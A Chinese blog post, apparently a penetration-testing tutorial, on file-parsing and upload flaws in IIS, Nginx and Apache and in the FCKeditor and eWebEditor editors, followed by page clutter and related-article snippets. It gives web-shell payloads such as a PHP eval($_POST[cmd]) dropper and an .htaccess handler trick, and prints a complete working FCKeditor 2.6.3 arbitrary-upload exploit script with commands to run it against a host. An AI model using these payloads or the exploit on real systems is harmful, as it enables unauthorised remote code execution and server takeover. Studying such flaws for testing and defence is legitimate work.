渗透之路基础 -- 初窥文件解析漏洞

最新推荐文章于 2021-11-16 15:04:11 发布
最新推荐文章于 2021-11-16 15:04:11 发布
阅读量214 收藏
点赞数
分类专栏: 技术篇 文章标签: 解析漏洞 渗透测试 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36628940/article/details/101000711
版权

文件解析漏洞(上)

IIS 5.x/6.0 解析漏洞

  1. 目录解析

    /xx.asp/xx.jpg

    网站下建立文件夹名为xx.asp、xx.asa的文件夹,其目录的任何扩展名的文件都被IIS当作asp文件来解析并执行。

    例如创建目录 asp.asp,那么

    /asp.asp/1.jpg

    将被当作asp文件来执行。假设黑阔可以控制上传文件夹路径,就可以不管你上传后你的图片改不改名都能拿shell了。

  2. 文件解析

    pamela.asp;.jpg

    在IIS6.0下,分号后面的不被解析,也就是说

    1.asp;.jpg

    会被服务器看成是1.asp

    还有IIS6.0 默认的可执行文件除了asp还包含这三种

    /wooyun.asa

    /wooyun.cer

    /wooyun.cdx

IIS 7.0/IIS 7.5/ Nginx <8.03畸形解析漏洞

  1. Nginx解析漏洞这个伟大的漏洞是我国安全组织80sec发现的…

    在默认Fast-CGI开启状况下,黑阔上传一个名字为1.jpg,内容为

    <?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>

    的文件,然后访问1.jpg/.php,在这个目录下就会生成一句话木马 shell.php

    这个漏洞案例

Nginx <8.03 空字节代码执行漏洞

  1. 影响版:0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37

    Nginx在图片中嵌入PHP代码然后通过访问

    xxx.jpg%00.php

    来执行其中的代码

Apache解析漏洞

  1. Apache 是从右到左开始判断解析,如果为不可识别解析,就再往左判断.

    比如 1.php.owf.rar “.owf”和”.rar” 这两种后缀是apache不可识别解析,apache就会把1.php.owf.rar解析成php.

    如何判断是不是合法的后缀就是这个漏洞的利用关键,测试时可以尝试上传一个1.php.rara.jpg.png…(把你知道的常见后缀都写上…)去测试是否是合法后缀。

其他

  1. 在windows环境下,xx.jpg[空格] 或xx.jpg. 这两类文件都是不允许存在的,若这样命名,windows会默认除去空格或点,黑客可以通过抓包,在文件名后加一个空格或者点绕过黑名单.若上传成功,空格和点都会被windows自动消除,这样也可以getshell。

    如果在Apache中.htaccess可被执行.且可被上传.那可以尝试在.htaccess中写入:

    <FilesMatch "Hackers.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

    然后再上传shell.jpg的木马, 这样shell.jpg就可解析为php文件

文件上传漏洞利用(下)

​ FCK编辑器漏洞解析演示,

​ filepath 集合解析漏洞

​ [0x02 教务网漏洞](…\0x02 教务网漏洞)

ewebeditror 编辑器的漏洞遍历

​ 判断是否存在dir目录遍历漏洞

​ 读取目录是通过 dir命令实现

​ 通过 dir=…/…/ 来进行遍历

fck 2.6.3 exp漏洞

exp利用

​ 借助环境:php

​ 找到 php.exe 的文件目录,编辑 cmd.bat 内容 cmd.exe

​ 将 exp代码 写入fck263.php中

fck263.php

<?php
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
define(STDIN, fopen("php://stdin", "r"));
$match = array();
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
print $resp;
return $resp;
}
function connector_response($html)
{
global $match;
return (preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/", $html, $match) && in_array($match[1], array(0, 201)));
}
print "\n+------------------------------------------------------------------+";
print "\n| FCKEditor Servelet Arbitrary File Upload Exploit |";
print "\n+------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path\n";
print "\nExample....: php $argv[0] localhost /\n";
print "\nExample....: php $argv[0] localhost /FCKEditor/\n";
die();
}
$host = $argv[1];
$path = ereg_replace("(/){2,}", "/", $argv[2]);
$filename = "fvck.gif";
$foldername = "fuck.php%00.gif";
$connector = "editor/filemanager/connectors/php/connector.php";
$payload = "-----------------------------265001916915724\r\n";
$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";
$payload .= "Content-Type: image/jpeg\r\n\r\n";
$payload .= 'GIF89a'."\r\n".'<?php eval($_POST[cmd]) ?>'."\n";
$payload .= "-----------------------------265001916915724--\r\n";
$packet = "POST {$path}{$connector}?Command=FileUpload&Type=Image&CurrentFolder=".$foldername." HTTP/1.0\r\n";//print $packet;
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=---------------------------265001916915724\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
print $packet;
if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");
else print "\n[-] Job done! try http://${host}/$match[2] \n";
?>

​ cmd执行

php.exe fck263.php


php.exe fck263.php 192.168.207.128 /fckeditor/

没有报错说明执行成功

手动上传路径

r0ckysec
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
解析漏洞集合
HxXh
03-07 569
一、IIS6.0解析漏洞iis6.0解析漏洞我觉着是最经典的解析漏洞了吧,现在一些小站这种漏洞还是仍然存在的1.目录解析       1.asp/1.jpg   可利用此突破上传,iis6.0会将1.jpg解析成1.asp2.文件解析       1.asp;.jpg   iis6.0从左向右解析,碰到;停止解析,把后面的jpg截断3.特殊格式       1.asa     1.cer    ...
fckeditor <= 2.6.4 任意文件上传漏洞
weixin_30640291的博客
01-06 996
<?error_reporting(0);set_time_limit(0);ini_set("default_socket_timeout", 5);define(STDIN, fopen("php://stdin", "r"));$match = array();function http_send($host, $packet){$sock = fsockopen($host, 80)...
fckeditor2.6之上传图片、附件以日期命名
12-08
修改Dispatcher类,让fckeditor 2.6可以修改上传的图片、附件的名称。这个jar包是以当前日期为上传文件重命名。重命名可以解决中文文件名乱码的问题...
FCKeditor安装文件及配置教程
12-12
FCKeditor安装文件及配置教程,开发网站时非常好用!
文件包含漏洞汇总-黑客/渗透测试/CTF通用
最新发布
08-09
适用于文件包含漏洞学者去进一步了解漏洞的利用,总结前人的经验
渗透测试上传漏洞经典靶场学习-upload-labs
07-02
### 渗透测试上传漏洞经典靶场学习-upload-labs #### 第一关:绕过前端JS限制 **漏洞概要**:此关卡中的漏洞主要体现在仅在前端JavaScript脚本中进行文件类型的简单验证,而服务器端(后端)并未进行任何有效的...
Web渗透测试-常见漏洞解析课件
03-23
本课件“Web渗透测试-常见漏洞解析”旨在深入探讨这一主题,帮助学习者理解和掌握如何有效地进行Web应用安全评估。 首先,我们要了解渗透测试的基本流程。它通常包括信息收集、漏洞扫描、漏洞利用、权限提升和清理...
web-渗透-文件上传漏洞专题靶场.rar
03-14
本靶场为二十一个关于文件上传漏洞的环境,从前端绕过、服务器绕过、木马图上传绕过、截断绕过、竞争条件等等几乎包含目前所有的文件上传漏洞类型,刷完即掌握文件上传漏洞的所有要点。 文件中打包了所需的所有环境...
DVWA-DVWA渗透测试平台文件
03-07
DVWA全称为Damn Vulnerable Web Application,意为存在糟糕漏洞web应用。它是一个基于PHP/MySQL开发的存在糟糕漏洞web应用,旨在为专业的安全人员提供一个合法的环境,来测试他们的工具和技能。帮助web开发人员...
Xxasp 网络硬盘 v3.3.2.rar
07-04
Xxasp 网络硬盘 V3.3.2 更新 2009.6.18修正删除文件夹时重新计算用户数据的错误修正后台搜索文件时关键字失效的问题。V3.3 更新 2009.6.12增加无限子目录功能,可分别加密或共享每一个目录 增加系统公告功能,可针对各个用户等级分别显示公告 系统提示新的未读信息及新的留言或回复 重新构建文件搜索条,增加关键字搜索 增加投诉建议功能,可直接留言给管理员 增加异站上传插件,可整合论坛博客等等外部上传 本系统使用ASP脚本编写,大量使用类封装,是一个高速、高效、简洁、安全、支持多组件的上传与提取系统。主要特点:1、支持国内外上传组件多达7种,包括:风声无组件上传类、AspUpload 3.0上传组件、SA-FileUp 4.9上传组件DvFile.Upload 1.0上传组件、IronSoft.Upload上传组件、LyfUpload.UploadFile上传组件、W3.Upload上传组件2、支持多文件同时上传、Jpeg,Gif图片生成缩略图、生成文字水印、生成图片水印.3、合理的使用系统缓存技术,在加速页面执行的同时不对服务器造成资源的浪费。4、系统从程序底层防止上传漏洞,防止任何恶意脚本文件的上传,确保系统的安全。5、支持控件方式上传,显示上传进度,支持断线续传,并提高上传速度6、用户间可共享文件,收藏喜爱的文件,用户可访问好友的共享空间7、用户可自建多达50个存放目录8、用户间可通过信件进行联系沟通,并增加黑名单防止骚扰9、系统生成清晰明了的图型空间统计图表10、系统支持文件举报功能,对违法文件进行举报,系统管理员可对违法空间进行关闭
FCKeditor2.6.3基本设置、使用说明
橙子撸代码专栏
10-13 3738
一.使用说明 1.FCKeditor的官方网站是:http://www.fckeditor.net/download 目前最新的FCKeditor 2.6.3版本。要下载FCKeditor_2.6.3.zip和   FCKeditor.NET_2.6.3.zip版的2个zip包。说明:FCKeditor_2.6.3.zip是其最新的Javascript文件和图片什么的;FCKedito
Fckeditor漏洞利用总结
weixin_34297704的博客
01-03 76
1.查看编辑器版本 FCKeditor/_whatsnew.html ————————————————————————————————————————————————————————————— 2. Version 2.2 版本 Apache+linux 环境下在上传文件后面加个.突破!测试通过。 —————————————————————————————————...
FckEditor,远程图片下载,插件
weixin_30861797的博客
11-02 116
有时候我们从其他网页上拷贝来的内容中含有图片,当原始地址失效后就会影响读者阅读。 所以我制作了这样一个插件,可以将远程图片保存到本地服务器。 声明:下面的文字是本文不可缺少的部分,转载请保留,谢谢! //////////////////////////////////////////////////// 作者:武眉博<活靶子.NET> 同时首发于: 落伍者...
[EXP]IIS全版本提权工具
weixin_30614109的博客
02-17 810
工具: iislpe.exe 编译: .net 3.5   全版本IIS提权工具,支持IIS应用池用户/网络服务用户/本地服务用户 原理: 通过NTLM重放将权限提升至SYSTEM权限,详情参考Potato。 用法: IIS Priviledge by k8gegeIIS APPPOOL / Network Service / Local ServiceUseage:ii...
BUU CTF web(二)
0xdawn的博客
04-08 2429
[RoarCTF 2019]Easy Java WEB-INF/web.xml泄露 WEB-INF主要包含一下文件或目录: /WEB-INF/web.xml:Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则。 /WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .j...
ASP网站漏洞解析及黑客入侵防范方法 选择自 hmilyld 的 Blog
InFoClass的专栏
08-23 1619
如何更好的达到防范黑客攻击,本人提一下个人意见!第一,免费程序不要真的就免费用,既然你可以共享原码,那么攻击者一样可以分析代码。如果在细节上注意防范,那样你站点的安全性就大大的提高了。即使出现了SQL Injection这样的漏洞,攻击者也不可能马上拿下你的站点。 由于ASP的方便易用,越来越多的网站后台程序都使用ASP脚本语言。但是, 由于ASP本身存在一些安全漏洞,稍不小心就会给黑客提供可乘之
编写内核驱动加载工具
r0cky的博客
11-03 877
             编写内核驱动加载工具 一丶加载内核驱动的常用API介绍. 加载内核驱动,使用我们的ring3下的API即可完成. API分别是: OpenSCManager  打开设备(服务)管理器 CreateService  创建服务(或者设备,根据参数不同而不同) OpenService     打开设备或者服务. StartService           启动...
常见的解析漏洞总结
m0_51428325的博客
11-16 430
一、解析漏洞 解析漏洞指的是服务器应用程序在解析某些精心构造的后缀文件时,会将其解析成网页脚本,从而导致网站的沦陷。大部分解析漏洞的产生都是由应用程序本身的漏洞导致的。 二、常见的解析漏洞 1、IIS5.x-6.x解析漏洞 使用 IIS5.x-6.x 版本的服务器,大多为Windows server 2003,网站比较古老,开发语句一般为asp;该解析漏洞也只能解析asp文件,不能解析aspx文件。 目录解析漏洞 IIS6.0中的目录解析漏洞,如果网站目录中有一个 *.asp/ 的文
Upload-labs靶场攻略:文件上传漏洞分析
"Upload-labs通关手册.pdf - 一个关于渗透测试的靶场平台,专注于文件上传漏洞的学习与实践。" Upload-labs是一个专门为安全研究人员和渗透测试者设计的在线靶场,它涵盖了各种类型的文件上传漏洞,帮助用户了解并...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值